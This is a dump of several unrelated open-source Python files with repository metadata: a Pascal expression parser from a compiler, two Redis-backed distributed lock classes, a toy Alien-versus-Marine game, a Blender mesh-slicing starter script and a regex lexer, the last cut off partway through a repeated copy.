                field = lhs.typ.find_field(field_name)
                lhs = expressions.Member(
                    lhs, field_name, field.typ, location
                )
            else:
                self.error(
                    "No such field {}".format(field_name), loc=location
                )
        elif self.peek == "^":
            # pointer dereference
            location = self.consume("^").loc
            if not lhs.typ.is_pointer:
                self.error(
                    "Expected pointer type, got {}".format(lhs.typ),
                    loc=location,
                )
            typ = lhs.typ.ptype
            lhs = expressions.Deref(lhs, typ, location)
        else:
            raise AssertionError("must be [, ^ or .")
    return lhs
def parse_expression_list(self):
    """ Parse one or more expressions seperated by ',' """
    return self.parse_one_or_more(self.parse_expression, ",")
def parse_condition(self):
    """ Parse an expression and demand that it is boolean typed. """
    condition = self.parse_expression()
    self.require_boolean(condition)
    return condition
def require_boolean(self, expr):
    """ Check the type of expression to be boolean, and raise
    an error if not.
    """
    is_boolean = self.context.equal_types(expr.typ, self._boolean_type)
    if not is_boolean:
        self.error("Expected boolean value", loc=expr.location)
def parse_expression(self) -> expressions.Expression:
    """ Parse an expression, starting at the weakest binding level. """
    lowest_priority = 0
    return self.parse_binop_with_precedence(lowest_priority)
def parse_binop_with_precedence(self, priority) -> expressions.Expression:
    """ Parse binary operators using a binding strength.
    This is a neat trick to parse expressions without a whole
    bunch of similar looking functions for each operator.
    We use the concept of binding strength, or priority
    to group expressions according to operator precendence.
    """
    lhs = self.parse_primary_expression()
    # _should_take uses a strict '>', so operators of equal priority
    # are not taken by the recursive call: left associativity.
    while self._should_take(priority):
        operator = self.consume()
        op = operator.val
        location = operator.loc
        operator_priority = self.operator_priorities[op]
        rhs = self.parse_binop_with_precedence(operator_priority)
        # Type-check / coerce according to the operator class:
        if op in ["+", "-", "*", "/", "div", "mod"]: # arithmatic stuff
            common_type = self.get_common_type(lhs, rhs, location)
            lhs = self.do_coerce(lhs, common_type)
            rhs = self.do_coerce(rhs, common_type)
            typ = common_type
        elif op in ["=", "<>", "<", ">", ">=", "<="]:
            # Comparisons coerce operands but yield boolean:
            common_type = self.get_common_type(lhs, rhs, location)
            lhs = self.do_coerce(lhs, common_type)
            rhs = self.do_coerce(rhs, common_type)
            typ = self._boolean_type
        elif op in ["and", "or"]:
            self.require_boolean(lhs)
            self.require_boolean(rhs)
            typ = self._boolean_type
        elif op == "in":
            # Set in operator..
            # TODO: type check!
            typ = self._boolean_type
        else: # pragma: no cover
            raise NotImplementedError(op)
        lhs = expressions.Binop(lhs, op, rhs, typ, location)
    return lhs
def _should_take(self, prio):
    """ Decide whether the pending operator binds stronger than *prio*. """
    operator_prio = self.operator_priorities.get(self.peek)
    return operator_prio is not None and operator_prio > prio
# Binding strengths for binary operators: higher binds tighter.
# Equal strengths associate to the left (see _should_take, which
# compares with a strict '>').
operator_priorities = {
    "*": 100,
    "/": 100,
    "div": 100,
    "mod": 100,
    "+": 80,
    "-": 80,
    "=": 60,
    "<": 60,
    ">": 60,
    "<=": 60,
    ">=": 60,
    "<>": 60,
    "in": 55,
    "and": 50,
    "or": 40,
}
def parse_primary_expression(self) -> expressions.Expression:
    """ Literal and parenthesis expression parsing """
    if self.peek == "(":
        self.consume("(")
        expr = self.parse_expression()
        self.consume(")")
    elif self.peek == "not":
        location = self.consume("not").loc
        rhs = self.parse_primary_expression()
        expr = expressions.Unop("not", rhs, rhs.typ, location)
    elif self.peek in ["+", "-"]:
        # Unary plus/minus; the token's .typ is "+" or "-" here (that
        # is exactly what the peek test matched), used as the Unop name.
        operator = self.consume()
        rhs = self.parse_primary_expression()
        expr = expressions.Unop(operator.typ, rhs, rhs.typ, operator.loc)
    elif self.peek == "NUMBER":
        val = self.consume("NUMBER")
        expr = expressions.Literal(val.val, self._integer_type, val.loc)
    elif self.peek == "REAL":
        val = self.consume("REAL")
        expr = expressions.Literal(val.val, self._real_type, val.loc)
    elif self.peek == "true":
        val = self.consume("true")
        expr = expressions.Literal(True, self._boolean_type, val.loc)
    elif self.peek == "false":
        val = self.consume("false")
        expr = expressions.Literal(False, self._boolean_type, val.loc)
    elif self.peek == "nil":
        location = self.consume("nil").loc
        # nil is typed as pointer-to-integer by default:
        typ = types.PointerType(self._integer_type)
        expr = expressions.Literal(None, typ, location)
    elif self.peek == "STRING":
        val = self.consume("STRING")
        location = val.loc
        text = val.val
        # A single character string literal is a char literal:
        typ = self._char_type if len(text) == 1 else self._string_type
        expr = expressions.Literal(text, typ, location)
    elif self.peek == "ID":
        symbol, location = self.parse_designator()
        expr = self.parse_function_call(symbol, location)
    elif self.peek == "[":
        # Set literal: [a, b, lo..hi, ...]; ranges become 2-tuples.
        location = self.consume("[").loc
        elements = []
        if self.peek != "]":
            while True:
                element = self.parse_expression()
                if self.peek == "..":
                    self.consume("..")
                    upper = self.parse_expression()
                    element = (element, upper)
                elements.append(element)
                if self.peek == ",":
                    self.consume(",")
                else:
                    break
        self.consume("]")
        element_type = self._integer_type # TODO! can be other than int?
        typ = types.SetType(element_type, location)
        expr = expressions.Literal(elements, typ, location)
    else:
        self.error(
            "Expected number, identifier or (expr), got {0}".format(
                self.peek
            )
        )
    return expr
def parse_function_call(self, symbol, location):
    """ Parse a builtin or user function call, or — when no argument
    list follows — a plain variable access.
    """
    if isinstance(symbol, symbols.BuiltIn):
        return self.parse_builtin_function_call(symbol.name, location)
    if self.peek != "(":
        return self.parse_variable_access(symbol, location)
    if not isinstance(symbol.typ, types.FunctionType):
        self.error("Cannot call non-function", loc=location)
    args = self.parse_actual_parameter_list(symbol.typ.parameter_types)
    return expressions.FunctionCall(
        symbol, args, symbol.typ.return_type, location
    )
def parse_builtin_function_call(self, func, location):
    """ Parse a call to a built-in function, type-checking the single
    argument and determining the result type per function.
    """
    if func == "ord":
        self.consume("(")
        arg = self.parse_expression()
        self.consume(")")
        # TODO!
        # char and enum allowed here..
        # arg = self.do_coerce(arg, self._char_type)
        args = [arg]
        typ = self._integer_type
    elif func == "chr":
        self.consume("(")
        arg = self.parse_expression()
        self.consume(")")
        if not arg.typ.is_integer:
            self.error("Must be integer type", loc=arg.location)
        typ = self._char_type
        args = [arg]
    elif func == "odd":
        self.consume("(")
        arg = self.parse_expression()
        self.consume(")")
        if not arg.typ.is_integer:
            self.error("Must be integer type", loc=arg.location)
        typ = self._boolean_type
        args = [arg]
    elif func in ["succ", "pred"]:
        self.consume("(")
        arg = self.parse_expression()
        self.consume(")")
        if not (arg.typ.is_integer or arg.typ.is_enum):
            self.error("Must be integer or enum type", loc=arg.location)
        # succ/pred preserve the argument's type:
        typ = arg.typ
        args = [arg]
    elif func in ["trunc", "round"]:
        self.consume("(")
        arg = self.parse_expression()
        self.consume(")")
        # NOTE(review): result type mirrors the argument type here —
        # trunc/round of a real staying real looks suspicious; confirm.
        typ = arg.typ
        args = [arg]
    elif func in ["sqr", "abs"]:
        self.consume("(")
        arg = self.parse_expression()
        self.consume(")")
        if not (arg.typ.is_integer or arg.typ.is_real):
            self.error("Must be integer or real type", loc=arg.location)
        typ = arg.typ
        args = [arg]
    elif func in ["sqrt", "sin", "cos", "arctan", "exp", "ln"]:
        self.consume("(")
        arg = self.parse_expression()
        self.consume(")")
        # Transcendental functions operate on reals:
        arg = self.do_coerce(arg, self._real_type)
        typ = self._real_type
        args = [arg]
    elif func in ["eof", "eoln"]:
        self.consume("(")
        arg = self.parse_expression()
        self.consume(")")
        if not arg.typ.is_file:
            self.error("Expected a file", loc=arg.location)
        # arg = self.do_coerce(arg, self._real_type)
        typ = self._boolean_type
        args = [arg]
    else:
        self.not_impl(func)
    expr = expressions.BuiltInFunctionCall(func, args, typ, location)
    return expr
def parse_one_or_more(self, parse_function, seperator: str):
    """ Parse one or more occurences parsed by parse_function
    seperated by seperator.
    """
    items = [parse_function()]
    while self.has_consumed(seperator):
        items.append(parse_function())
    return items
def do_coerce(self, expr: expressions.Expression, to_type: types.Type):
    """ Try to convert expression into the given type.
    expr: the expression value with a certain type
    typ: the type that it must be
    Raises an error is the conversion cannot be done.
    """
    from_type = expr.typ
    loc = expr.location
    # Resolve type aliases before comparing:
    from_type = self.context.get_type(from_type)
    to_type = self.context.get_type(to_type)
    # Evaluate types from pointer, unsigned, signed to floating point:
    if self.context.equal_types(from_type, to_type):
        # no cast required
        auto_cast = False
    elif from_type.is_pointer and to_type.is_pointer:
        # Pointers are pointers, no matter the pointed data.
        # But a conversion of type is still needed:
        auto_cast = True
    elif from_type.is_set and to_type.is_set:
        # TODO: how to handle sets?
        auto_cast = False
    elif from_type.is_enum and to_type.is_subrange:
        # TODO: do some extra checks?
        auto_cast = True
    elif isinstance(from_type, types.UnsignedIntegerType) and isinstance(
        to_type, types.PointerType
    ):
        # Unsigned integers can be used as pointers without problem
        # Signed integers form a problem, because those can be negative
        # and thus must be casted explicitly.
        auto_cast = True
    elif (
        isinstance(from_type, types.UnsignedIntegerType)
        and isinstance(to_type, types.UnsignedIntegerType)
        and from_type.bits <= to_type.bits
    ):
        # Widening unsigned -> unsigned is always safe:
        auto_cast = True
    elif (
        isinstance(from_type, types.SignedIntegerType)
        and isinstance(to_type, types.SignedIntegerType)
        and from_type.bits <= to_type.bits
    ):
        # Widening signed -> signed is always safe:
        auto_cast = True
    elif (
        isinstance(from_type, types.UnsignedIntegerType)
        and isinstance(to_type, types.SignedIntegerType)
        and from_type.bits < to_type.bits - 1
    ):
        # Unsigned fits in a strictly wider signed type (sign bit spare):
        auto_cast = True
    elif (
        isinstance(from_type, types.UnsignedIntegerType)
        and isinstance(to_type, types.FloatType)
        and from_type.bits < to_type.fraction_bits
    ):
        # Integer must fit the float's mantissa to convert losslessly:
        auto_cast = True
    elif (
        isinstance(from_type, types.SignedIntegerType)
        and isinstance(to_type, types.FloatType)
        and from_type.bits < to_type.fraction_bits
    ):
        auto_cast = True
    elif isinstance(from_type, types.IntegerType) and isinstance(
        to_type, types.IntegerType
    ):
        # Remaining integer conversions (possibly narrowing) are still
        # performed implicitly:
        auto_cast = True
    elif (
        self.context.equal_types(from_type, self._string_type)
        and to_type.is_array
    ):
        # TODO: how to handle strings?
        auto_cast = True
    elif (
        from_type.is_function
        and len(from_type.parameter_types) == 0
        and self.context.equal_types(from_type.return_type, to_type)
    ):
        # Cool automatic invoke function when return type is wanted!
        auto_cast = True
        expr = expressions.FunctionCall(
            expr, [], from_type.return_type, expr.location
        )
    else:
        self.error(
            "Cannot use '{}' as '{}'".format(from_type, to_type), loc=loc
        )
    # Perform the coercion:
    if auto_cast:
        expr = expressions.TypeCast(to_type, expr, loc)
    return expr
def get_common_type(self, a, b, loc):
    """Determine the greatest common type of two typed expressions.

    Used for coercing the operands of binary operators. For example:
    - int + float -> float
    - byte + int -> int
    - byte + byte -> byte
    - pointer to x + int -> pointer to x

    ``loc`` is the source location (currently unused here).
    """
    # Resolve both operand types, then keep whichever one ranks
    # higher according to the type-preference heuristic.
    candidates = [self.context.get_type(operand.typ) for operand in (a, b)]
    return max(candidates, key=self._get_type_rank)
def _get_type_rank(self, typ):
    """Return a numeric preference rank for *typ* (higher is preferred).

    Reals outrank pointer-like types, which outrank integers; within
    reals and integers the bit width breaks ties.
    """
    if typ.is_real:
        return 2000 + typ.bits
    if typ.is_pointer or typ.is_array or typ.is_enum or typ.is_set:
        return 1000
    if typ.is_integer:
        return 40 + typ.bits
    # Any other type is not supported by this ranking.
    self.not_impl(str(typ))
| {
"repo_name": "windelbouwman/ppci-mirror",
"path": "ppci/lang/pascal/parser.py",
"copies": "1",
"size": "48001",
"license": "bsd-2-clause",
"hash": 3139028104172118500,
"line_mean": 34.7416232316,
"line_max": 147,
"alpha_frac": 0.520593321,
"autogenerated": false,
"ratio": 4.453609203933939,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00012252278128889566,
"num_lines": 1343
} |
"""A Redis backed distributed global lock
This code uses the formula here:
https://github.com/jeffomatic/redis-exp-lock-js
It provides several improvements over the original version based on:
http://chris-lamb.co.uk/2010/06/07/distributing-locking-python-and-redis/
It provides a few improvements over the one present in the Python redis
library, for example since it utilizes the Lua functionality, it no longer
requires every client to have synchronized time.
"""
# Copyright 2010,2011 Chris Lamb <lamby@debian.org>
import gevent
import uuid
from vkontakte_viomg.utils import global_connection
# Lua script executed atomically on the Redis server to acquire the
# lock: SETNX stores our UUID only when the key is free, and on success
# an EXPIRE is attached so a crashed client cannot hold the lock forever.
acquire_lua = """
local result = redis.call('SETNX', KEYS[1], ARGV[1])
if result == 1 then
redis.call('EXPIRE', KEYS[1], ARGV[2])
end
return result"""

# Lua script to release the lock: the key is deleted only when it still
# holds our UUID, so we never delete a lock acquired by another client.
release_lua = """
if redis.call('GET', KEYS[1]) == ARGV[1] then
return redis.call('DEL', KEYS[1])
end
return 0
"""
class Lock(object):
    """Distributed lock backed by Redis Lua scripts (CAS semantics)."""

    def __init__(self, key, expires=60, timeout=10, redis=None):
        """Distributed locking using Redis Lua scripting for CAS operations.

        Usage::

            with Lock('my_lock'):
                print "Critical section"

        :param key: Redis key under which the lock is stored.
        :param expires: We consider any existing lock older than
                        ``expires`` seconds to be invalid in order to
                        detect crashed clients. This value must be higher
                        than it takes the critical section to execute.
        :param timeout: If another client has already obtained the lock,
                        sleep for a maximum of ``timeout`` seconds before
                        giving up. A value of 0 means we never wait.
        :param redis: The redis instance to use if the default global
                      redis connection is not desired.
        """
        self.key = key
        self.timeout = timeout
        self.expires = expires
        if not redis:
            redis = global_connection.redis
        self.redis = redis
        # Pre-register both scripts so acquire/release are single,
        # atomic server-side round-trips.
        self._acquire_lua = redis.register_script(acquire_lua)
        self._release_lua = redis.register_script(release_lua)
        # UUID identifying *our* hold on the lock; None when not held.
        self.lock_key = None

    def __enter__(self):
        self.acquire()
        # Bug fix: return self so ``with Lock(...) as lock`` binds the
        # lock object instead of None.
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        self.release()

    def acquire(self):
        """Acquire the lock

        :returns: Whether the lock was acquired or not
        :rtype: bool
        :raises LockTimeout: if the lock could not be acquired within
                             ``timeout`` seconds.
        """
        self.lock_key = uuid.uuid4().hex
        timeout = self.timeout
        while timeout >= 0:
            if self._acquire_lua(keys=[self.key],
                                 args=[self.lock_key, self.expires]):
                # Bug fix: actually return the boolean promised by the
                # docstring instead of falling through with None.
                return True
            # Poll every 100ms until our timeout budget is exhausted.
            timeout -= 0.1
            if timeout >= 0:
                gevent.sleep(0.1)
        raise LockTimeout("Timeout while waiting for lock")

    def release(self):
        """Release the lock

        This only releases the lock if it matches the UUID we think it
        should have, to prevent deleting someone else's lock if we
        lagged.
        """
        if self.lock_key:
            self._release_lua(keys=[self.key], args=[self.lock_key])
        self.lock_key = None
class LockTimeout(BaseException):
    """Raised in the event a timeout occurs while waiting for a lock"""
    # NOTE(review): derives from BaseException (not Exception), so a
    # blanket ``except Exception`` in client code will not swallow it.
| {
"repo_name": "yablochkin/vkontakte-viomg",
"path": "vkontakte_viomg/lock.py",
"copies": "1",
"size": "3261",
"license": "mit",
"hash": -3917200331624689000,
"line_mean": 29.7641509434,
"line_max": 77,
"alpha_frac": 0.6022692426,
"autogenerated": false,
"ratio": 4.133079847908745,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5235349090508745,
"avg_score": null,
"num_lines": null
} |
"""A Redis backed distributed global lock
This lock based mostly on this excellent example:
http://chris-lamb.co.uk/2010/06/07/distributing-locking-python-and-redis/
This code add's one change as suggested by the Redis documentation regarding
using locks in Redis, which is to only delete the Redis lock if we actually
completed within the timeout period. If we took too long to execute, then the
lock stored here is actually from a *different* client holding a lock and
we shouldn't be deleting their lock.
"""
# Copyright 2010,2011 Chris Lamb <lamby@debian.org>
import time
from retools import global_connection
class Lock(object):
    def __init__(self, key, expires=60, timeout=10, redis=None):
        """
        Distributed locking using Redis SETNX and GETSET.

        Usage::

            with Lock('my_lock'):
                print "Critical section"

        :param expires: We consider any existing lock older than
            ``expires`` seconds to be invalid in order to
            detect crashed clients. This value must be higher
            than it takes the critical section to execute.
        :param timeout: If another client has already obtained the lock,
            sleep for a maximum of ``timeout`` seconds before
            giving up. A value of 0 means we never wait.
        :param redis: The redis instance to use if the default global
            redis connection is not desired.
        """
        self.key = key
        self.timeout = timeout
        self.expires = expires
        if not redis:
            redis = global_connection.redis
        self.redis = redis
        # Wall-clock time at which we obtained the lock; used by
        # __exit__ to decide whether our hold is still valid.
        self.start_time = time.time()

    def __enter__(self):
        redis = self.redis
        timeout = self.timeout
        while timeout >= 0:
            # Value stored under the key: the absolute time at which the
            # lock should be considered expired (+1 second of slack).
            expires = time.time() + self.expires + 1
            if redis.setnx(self.key, expires):
                # We gained the lock; enter critical section
                self.start_time = time.time()
                redis.expire(self.key, int(self.expires))
                return
            current_value = redis.get(self.key)
            # We found an expired lock and nobody raced us to replacing it.
            # GETSET returns the previous value, so only one client can
            # observe the expired timestamp it just replaced.
            if current_value and float(current_value) < time.time() and \
                redis.getset(self.key, expires) == current_value:
                    self.start_time = time.time()
                    redis.expire(self.key, int(self.expires))
                    return
            # Lock is held by someone else; poll once per second until
            # our own timeout budget runs out.
            timeout -= 1
            if timeout >= 0:
                time.sleep(1)
        raise LockTimeout("Timeout while waiting for lock")

    def __exit__(self, exc_type, exc_value, traceback):
        # Only delete the key if we completed within the lock expiration,
        # otherwise, another lock might've been established
        if time.time() - self.start_time < self.expires:
            self.redis.delete(self.key)
class LockTimeout(BaseException):
    """Raised in the event a timeout occurs while waiting for a lock"""
    # NOTE(review): subclasses BaseException so it is not caught by a
    # generic ``except Exception`` handler in caller code.
| {
"repo_name": "mozilla-services/retools",
"path": "retools/lock.py",
"copies": "2",
"size": "3093",
"license": "mit",
"hash": -6077089054402341000,
"line_mean": 36.265060241,
"line_max": 77,
"alpha_frac": 0.6000646621,
"autogenerated": false,
"ratio": 4.541850220264317,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6141914882364317,
"avg_score": null,
"num_lines": null
} |
### Maybe I'll need this one day
class Player(object):
    # Placeholder class; currently unused by the rest of the game.
    def __init__(self):
        pass
### Quick, sleek and pointy teeth
class Alien(object):
    def __init__(self,name):
        self.name = name
        # Hit points; the marine deals 50 damage per hit in fight().
        self.health = 100

    def bite(self, weapon):
        # NOTE(review): uses the module-level globals ``alien`` and
        # ``marine`` rather than ``self``/an argument -- this only works
        # for the single global Alien instance created at the bottom of
        # the file.
        fight(alien, marine, weapon)
### Large, lumbering and with guns
class Marine(object):
    def __init__(self, name, rounds):
        self.name = name
        # Current ammo; the game ends when this reaches zero.
        self.rounds = rounds
        # Remember the starting ammo so runGame() can reset it.
        self.initRounds = rounds
        self.weapon = ""

    def fire(self, weapon):
        # Bug fix: decrement *this* marine's ammo instead of reaching
        # for the module-level ``marine`` global, so the method works
        # for any Marine instance.
        self.rounds -= 1
        fight(self, alien, weapon)
### Armory ##################################################
#weapons = {
# 'Pulse rifle' : ''
### Functions ###############################################
def checkForHit():
attackPoint = randint(1,9)
defendPoint = randint(1,9)
if attackPoint > defendPoint:
hit = True
else:
hit = False
return hit
def fight(attacker, defender, weapon):
    # Resolve one attack between the global ``alien`` and ``marine``.
    # NOTE(review): ``defender`` is never used; damage is applied to the
    # globals directly, and only the marine ever deals damage here -- a
    # successful alien bite never reduces anything.
    hit = checkForHit()
    if attacker == alien and hit:
        print "Alien attacks with %s and hits!\n" % weapon,
    elif attacker == alien and not hit:
        print "Alien attacks with %s but misses!\n" % weapon,
    elif attacker == marine and hit:
        print "Marine fires %s and hits!\n" % weapon,
        # Flat 50 damage per marine hit, regardless of weapon.
        alien.health -= 50
    elif attacker == marine and not hit:
        print "Marine fires %s but misses!\n" % weapon,
    else:
        # NOTE(review): bare ``exit`` is a no-op expression -- presumably
        # meant to call exit(); verify intent.
        exit
    # NOTE(review): "har" looks like a typo for "has" in the message below.
    print "Alien has %s health, marine har %s rounds left in gun.\n" % (alien.health,marine.rounds)
def chooseSides():
print "Which side do you want to play?"
print "1: Alien"
print "2: Marine"
side = raw_input("> ")
if side == "1":
print "Sorry, they're too sacry."
chooseSides()
elif side == "2":
return side
else:
print "What?"
chooseSides()
def chooseWeapon():
    # Prompt for the marine's weapon and store the choice on the global
    # ``marine`` object.
    print "Which gun do you want to use?"
    print "1: Pulse rifle - 50dmg, 75% chance to hit."
    print "2: Grenade launcher - 100dmg, 50% chance to hit."
    weapon = int(raw_input("> "))
    # NOTE(review): non-numeric input raises ValueError here, and any
    # number other than 1/2 silently leaves marine.weapon unchanged --
    # presumably this should re-prompt like chooseSides(); confirm.
    # Also note the advertised damage/hit chances are not implemented by
    # fight(), which always rolls 1-9 and applies a flat 50 damage.
    if weapon == 1:
        marine.weapon = "pulse rifle"
    elif weapon == 2:
        marine.weapon = "grenade launcher"
def ticker(ticks):
while ticks > 0:
print " "
ticks -= 1
sleep(2)
def playAgain():
playAgain = raw_input("\nPlay again? (y/n)")
if playAgain == "y":
runGame()
elif playAgain == "n":
print "Goodbye!"
else:
print "What?"
playAgain()
def runGame():
alien.health = 100
marine.rounds = marine.initRounds
side = chooseSides()
side = 1
if side == "1":
print "You're the Alien!"
elif side == "2":
print "You're the Marine!"
chooseWeapon()
else:
print "ERROR 1"
while marine.rounds > 0:
marine.fire(marine.weapon)
if alien.health <= 0:
print "\n### Marine wins!"
break
elif marine.rounds == 0:
alien.bite("claws")
print "\n### Alien wins!"
break
playAgain()
### Create the players
# Module-level singletons; the class methods and fight() rely on these
# exact globals.
alien = Alien("Geoff")
marine = Marine("Steve",5)

### Go!
# Kick off the interactive game loop (blocks on raw_input).
runGame()
| {
"repo_name": "andersekbom/pyliens",
"path": "main/pyliens_bu.py",
"copies": "1",
"size": "3410",
"license": "mit",
"hash": 8887073904065293000,
"line_mean": 21.8859060403,
"line_max": 99,
"alpha_frac": 0.5363636364,
"autogenerated": false,
"ratio": 3.5082304526748973,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.45445940890748976,
"avg_score": null,
"num_lines": null
} |
# A reference and starting point for your own Sly scripts.
#
# Python nano-tutorial:
# * Anything after a # character on a line is a comment, so Python will
# ignore it.
# * Indentation matters. Make sure every line in a section is indented the
# same number of spaces.
# * Python is case-sensitive.
#
# Import statements. These load in any special functions you use in your
# script. Shouldn't have to change these.
from sly.slicer import SliceDef, to_slices
import sly.plotter
import sly.ops
import sly.bcontext
import bpy
import mathutils
# Path to the SVG file if you're exporting one.
# On OSX this would probably look like
# "/Users/myuser/Documents/blabla.svg"
# and on Windows something like
# "C:\Users\myuser\Documents\blabla.svg"
# Unix/Linux users shouldn't need any help with this :-)
SVG_OUTFILE = '/path/to/output.svg'

# How thick should the slice parts be? Ex. If you've scaled your
# model so that 1 unit=1 inch, and you measured your material
# to be 0.24 inches thick, enter 0.24 here.
THICKNESS = 0.5

# These variables are handy for specifying slice directions.
# Each is a unit normal vector in (X, Y, Z) form.
X_DIR = (1, 0, 0)  # A plane with its face pointing in the X direction
Y_DIR = (0, 1, 0)  # ... in the Y direction
Z_DIR = (0, 0, 1)  # ... in the Z direction

# A SliceDef is how you define the slices that you want created.
# At a minimum, it must define the location of the slice plane.
# Plane locations are expressed in "co, no" form: A COordinate that
# lies on the plane, and the 3D NOrmal vector of the plane. Each of these
# are expressed as (X, Y, Z) vectors.
slice_defs = [
    SliceDef((0, 0, 0), X_DIR),  # The YZ plane
    SliceDef((3, 0, 0), X_DIR),  # The YZ plane moved 3 units in the X dir.

    # Optional arguments for SliceDef:
    #
    # * name - A string to override the generated name for this slice.
    # * z_index - Integer. Higher values will stack above slices with lower
    #             values. Useful for making sure that all slices in your
    #             construction are supported below by another slice (or the
    #             (ground).
    SliceDef((0, -2, 0), Y_DIR, z_index=1),
    SliceDef((0, 2, 0), Y_DIR, name="Front Part", z_index=1)
]

# Ask Blender for the mesh of whichever object you have selected in your
# scene. This needs to be executed in Object mode.
mesh = sly.bcontext.selected_bmesh()

# Hide the source object from view in Blender, so we can see the slices.
bpy.context.object.hide = True

# Where the magic happens. Sly returns a list of Slices from three required
# arguments: the mesh to slice up, the list of SliceDefs, and the thickness
# of the slices, in Blender units.
slices = to_slices(mesh, slice_defs, THICKNESS)

# to_slices has an additional optional argument:
#
# fillet_radius - Set to a positive number if you want the cutouts in your
# slice to have dogbone fillets. If you're cutting out your design on a CNC
# router, set this to the radius (half diameter) of the bit you're using. It
# will make the slices fit together better since the bit will be able to cut
# closer to the ideal square bottom.
#
# slices = to_slices(mesh, slice_defs, THICKNESS, fillet_radius=0.0625)

# Create a page to draw our 2D slice shapes onto. The numbers are the width
# and height of the output SVG, but we don't do any automatic placement. So
# you'll still probably want to use a program like Illustrator or Inkscape
# to position the slices.
page = sly.plotter.Page(10, 10)

# Do this stuff for each slice that was created by to_slices
for sli in slices:
    # Add the slice to the page we created above (for SVG output)
    page.add_slice(sli)

    # Apply the "border" operation to the slice. Cuts out the centers of the
    # slice and leaves a border of the specified thickness. Good for a
    # more lightweight-looking end result. We're making our border 2x the
    # thickness of our material; that should produce a nice effect without
    # weakening the construction too much.
    sly.ops.border(sli, THICKNESS * 2)

    # Finally, add the slice to the Blender scene as a new object. The object
    # will include the 'name' attribute you specified in the
    # SliceDef.
    sly.bcontext.add_slice(sli)

# Uncomment the next line if you want to export an SVG file as well.
# Make sure you specified a valid file path above!
# sly.plotter.SVGEncoder.encode(page, SVG_OUTFILE)
| {
"repo_name": "meshulam/sly",
"path": "example/starter.py",
"copies": "1",
"size": "4408",
"license": "mit",
"hash": 4179153313929770000,
"line_mean": 39.0727272727,
"line_max": 79,
"alpha_frac": 0.7046279492,
"autogenerated": false,
"ratio": 3.479084451460142,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4683712400660142,
"avg_score": null,
"num_lines": null
} |
# A regex-based Lexer/tokenizer.
# See the if __main__ section in the bottom for an example.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
import re
import sys
class Token(object):
    """Simple token record: type, matched value and buffer position."""

    def __init__(self, type, val, pos):
        self.type = type
        self.val = val
        self.pos = pos

    def __str__(self):
        # Render as TYPE(value) at position.
        fields = (self.type, self.val, self.pos)
        return '%s(%s) at %s' % fields
class LexerError(Exception):
    """Raised when no lexing rule matches the current input position.

    pos: offset into the input buffer where the error occurred.
    """

    def __init__(self, pos):
        self.pos = pos
class Lexer(object):
    """ A simple regex-based lexer/tokenizer.

        See below for an example of usage.
    """
    def __init__(self, rules, skip_whitespace=True):
        """ Create a lexer.

            rules:
                A list of rules. Each rule is a `regex, type`
                pair, where `regex` is the regular expression used
                to recognize the token and `type` is the type
                of the token to return when it's recognized.

            skip_whitespace:
                If True, whitespace (\s+) will be skipped and not
                reported by the lexer. Otherwise, you have to
                specify your rules for whitespace, or it will be
                flagged as an error.
        """
        # Concatenate all rule regexes into a single alternation with
        # named groups. Group names must be valid Python identifiers
        # while token types are arbitrary strings, so auto-generated
        # names (GROUP1, GROUP2, ...) are mapped back to token types.
        parts = []
        self.group_type = {}
        for index, (regex, type) in enumerate(rules, 1):
            groupname = 'GROUP%s' % index
            self.group_type[groupname] = type
            parts.append('(?P<%s>%s)' % (groupname, regex))
        self.regex = re.compile('|'.join(parts))
        self.skip_whitespace = skip_whitespace
        self.re_ws_skip = re.compile('\S')

    def input(self, buf):
        """ Initialize the lexer with a buffer as input.
        """
        self.buf = buf
        self.pos = 0

    def token(self):
        """ Return the next token (a Token object) found in the
            input buffer. None is returned if the end of the
            buffer was reached.

            In case of a lexing error (the current chunk of the
            buffer matches no rule), a LexerError is raised with
            the position of the error.
        """
        if self.pos >= len(self.buf):
            return None
        if self.skip_whitespace:
            # Jump ahead to the next non-whitespace character.
            ws = self.re_ws_skip.search(self.buf[self.pos:])
            if ws is None:
                return None
            self.pos += ws.start()
        m = self.regex.match(self.buf[self.pos:])
        if m is None:
            # No rule matched at the current position.
            raise LexerError(self.pos)
        name = m.lastgroup
        tok = Token(self.group_type[name], m.group(name), self.pos)
        self.pos += m.end()
        return tok

    def tokens(self):
        """ Returns an iterator to the tokens found in the buffer.
        """
        while True:
            tok = self.token()
            if tok is None:
                break
            yield tok
if __name__ == '__main__':
    # Demo: tokenize a simple assignment expression.
    rules = [
        ('\d+', 'NUMBER'),
        ('[a-zA-Z_]\w+', 'IDENTIFIER'),
        ('\+', 'PLUS'),
        ('\-', 'MINUS'),
        ('\*', 'MULTIPLY'),
        ('\/', 'DIVIDE'),
        ('\(', 'LP'),
        ('\)', 'RP'),
        ('=', 'EQUALS'),
    ]

    lx = Lexer(rules, skip_whitespace=True)
    lx.input('erw = _abc + 12*(R4-623902) ')

    try:
        for tok in lx.tokens():
            print tok
    # NOTE(review): Python 2 except syntax. Also note the IDENTIFIER
    # rule requires at least two characters ([a-zA-Z_]\w+), so a
    # one-letter name would raise LexerError here.
    except LexerError, err:
        print 'LexerError at position', err.pos
| {
"repo_name": "evandrix/Splat",
"path": "doc/parser/lexer.py",
"copies": "1",
"size": "4457",
"license": "mit",
"hash": -949195472658355300,
"line_mean": 30.1678321678,
"line_max": 67,
"alpha_frac": 0.4808166928,
"autogenerated": false,
"ratio": 4.417244796828543,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00921712729456675,
"num_lines": 143
} |
# A regex-based Lexer/tokenizer.
# See the if __main__ section in the bottom for an example.
#
#-----------------------------------------------
# Eli Bendersky (eliben@gmail.com)
# License: this code is in the public domain
# Last modified: March 2009
#-----------------------------------------------
#
import re
import sys
class Token(object):
    """A lexer token.

    Attributes:
        type: the token's type string.
        val: the matched text.
        pos: offset of the match in the input buffer.
    """

    def __init__(self, type, val, pos):
        self.type, self.val, self.pos = type, val, pos

    def __str__(self):
        return '%s(%s) at %s' % (self.type, self.val, self.pos)
